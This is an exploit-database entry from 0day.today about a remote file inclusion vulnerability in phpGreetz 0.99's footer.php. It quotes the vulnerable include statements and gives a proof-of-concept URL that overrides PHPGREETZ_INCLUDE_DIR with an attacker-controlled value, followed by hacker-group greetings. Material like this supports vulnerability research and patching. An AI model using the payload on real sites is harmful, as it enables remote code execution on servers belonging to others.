[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability

Author
mozi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-922
Category
web applications
Date add
03-10-2006
Platform
unsorted
================================================================
phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability
================================================================



# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team

 
#phpfreaks again
# heh tnx



#  0day.today [2024-12-25]  #